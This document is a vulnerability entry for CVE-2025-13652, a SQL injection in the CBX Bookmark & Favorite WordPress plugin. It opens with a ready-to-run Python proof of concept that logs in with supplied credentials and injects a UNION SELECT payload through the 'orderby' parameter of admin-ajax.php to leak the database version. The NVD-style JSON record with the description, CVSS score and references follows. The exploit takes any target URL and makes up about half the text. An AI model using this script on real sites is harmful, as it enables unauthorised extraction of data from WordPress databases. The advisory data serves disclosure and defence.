CVE-2025-13652

import requests import sys # CVE-2025-13652 PoC - CBX Bookmark & Favorite SQL Injection # Target: WordPress site with CBX Bookmark & Favorite plugin <= 2.0.4 target = input("Enter target URL: ") username = input("Enter username: ") password = input("Enter password: ") # Step 1: Login to WordPress to get authentication cookie login_url = f"{target}/wp-login.php" session = requests.Session() login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': target, 'testcookie': '1' } session.post(login_url, data=login_data) # Step 2: Exploit SQL Injection via orderby parameter # Malicious payload to extract database version sql_payload = "1 UNION SELECT 1,2,3,4,5,@@version,7,8,9,10--" exploit_url = f"{target}/wp-admin/admin-ajax.php" params = { 'action': 'cbxbookmark_listing', 'orderby': sql_payload, 'order': 'ASC' } print(f"[*] Sending exploit request with payload: {sql_payload}") response = session.get(exploit_url, params=params) print(f"[*] Response status: {response.status_code}") print(f"[*] Response preview: {response.text[:500]}") if '5.' in response.text or '8.' in response.text: print("[+] SQL Injection confirmed! Database version leaked.") else: print("[-] Exploitation may have failed, check response manually.")

{"cve": {"id": "CVE-2025-13652", "sourceIdentifier": "[email protected]", "published": "2026-01-06T04:15:52.740", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The CBX Bookmark & Favorite plugin for WordPress is vulnerable to generic SQL Injection via the ‘orderby’ parameter in all versions up to, and including, 2.0.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}, {"lang": "es", "value": "El plugin CBX Bookmark &amp; Favorite para WordPress es vulnerable a una inyección SQL genérica a través del parámetro 'orderby' en todas las versiones hasta la 2.0.4, inclusive, debido a un escape insuficiente en el parámetro proporcionado por el usuario y a la falta de preparación suficiente en la consulta SQL existente. Esto permite a atacantes autenticados, con acceso de nivel Suscriptor y superior, añadir consultas SQL adicionales a consultas ya existentes que pueden utilizarse para extraer información sensible de la base de datos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3413499/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a8839665-8f98-4c81-b234-9201236e0194?source=cve", "source": "[email protected]"}]}}